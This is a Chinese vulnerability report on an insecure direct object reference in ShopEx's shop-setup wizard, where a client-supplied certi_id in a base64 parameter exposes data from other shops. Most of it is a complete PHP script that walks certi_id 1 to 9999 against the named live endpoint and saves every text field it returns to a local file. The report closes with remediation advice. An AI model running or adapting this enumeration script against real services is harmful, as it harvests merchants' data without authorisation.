|
简要描述:
ShopEx 网店向导接口存在越权访问缺陷(certi_id 由客户端任意指定,服务端不做归属校验),可遍历所有使用 ShopEx 的网站
详细说明:
问题出现在 ShopEx 网店使用向导页面(guide.ecos.shopex.cn 的 step2.php)。
示例 URL(refer 参数已截断):http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer 参数经 base64 解码(注意:base64 只是编码,并不是加密)后为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
我们修改 certi_id 即可遍历所有使用了 ShopEx 程序的网站——服务端只按客户端提交的 certi_id 返回数据,并未校验该 id 是否属于当前请求者(典型的不安全直接对象引用,IDOR)。下面的 PHP 脚本枚举 certi_id 1~9999,并把返回页面中各 text 输入框的 name:value 追加保存到文件。
<?php
// Walk certi_id 1..9999 against the ShopEx guide endpoint; ShowshopExD()
// (defined below) does the request, the hit check and the file output.
foreach (range(1, 9999) as $cid) {
    ShowshopExD($cid);
}
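/**
 * Probe one ShopEx certificate id through the guide wizard and record what it leaks.
 *
 * Builds the "refer" blob the wizard expects ({"certi_id":N,"callback_url":...}),
 * requests step2.php with it and, when the server echoes the blob back (the PoC
 * treats that as a live certi_id), appends the name:value of every
 * <input type="text"> on the returned page to $outfile and echoes it.
 *
 * @param int|string $cid     certi_id to probe; passed through intval() before encoding
 * @param string     $outfile file that hits are appended to (the original hard-coded c:/shopEx.txt)
 * @return void
 */
function ShowshopExD($cid, $outfile = 'c:/shopEx.txt')
{
    $endpoint = 'http://guide.ecos.shopex.cn/step2.php';

    // The "refer" parameter is plain base64-encoded JSON, not encrypted or signed:
    // the server accepts whatever certi_id the client puts in it, which is the
    // whole vulnerability. The JSON literal below is kept exactly as in the PoC.
    $refer = base64_encode('{"certi_id":' . intval($cid) . ',"callback_url":"http:\/\/www.a.com\/"}');

    // base64 output may contain '+' and '=', which a query string mangles ('+'
    // arrives as a space), so percent-encode it instead of appending it raw.
    $url = $endpoint . '?refer=' . urlencode($refer);

    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    // Without a timeout a single hung request stalls the entire enumeration loop.
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    $result = curl_exec($ch);
    $error  = curl_error($ch);
    curl_close($ch);

    if ($result === false) {
        echo 'certi_id ' . intval($cid) . ': request failed (' . $error . ")\r\n";
        flush();
        return;
    }

    $result = mb_convert_encoding($result, "gb2312", "UTF-8");

    // The PoC's hit test: a page that echoes the refer blob back. strpos() returns
    // 0 for a match at offset 0, so compare against false instead of relying on truthiness.
    if (strpos($result, $refer) === false) {
        flush();
        return;
    }

    $fp = fopen($outfile, 'ab');
    if ($fp === false) {
        echo 'cannot open ' . $outfile . " for appending\r\n";
        flush();
        return;
    }

    preg_match_all('/<input\stype="text"(.*?)\/>/', $result, $inputs);
    foreach ($inputs[1] as $attrs) {
        // Extract name="..." / value="..." from the input's attributes; an input
        // missing either would otherwise produce an empty ":" line and a notice.
        if (!preg_match('/name="(.*?)"(.*?)value="(.*?)"/', trim($attrs), $m)) {
            continue;
        }
        $line = $m[1] . ':' . $m[3] . "\r\n";
        echo $line;
        fwrite($fp, $line);
    }
    echo '--------------------------------' . "\r\n";
    fclose($fp);
    flush();
}
?>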
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
修复建议:原文建议将 refer 换成其他加密方式。需要说明的是,base64 只是编码而非加密;对 refer 加密或签名能阻止客户端伪造 certi_id,但更直接、可靠的修复是服务端校验 certi_id 是否属于当前会话/请求者(并对该接口做频率限制),而不是依赖 refer 不可读。
|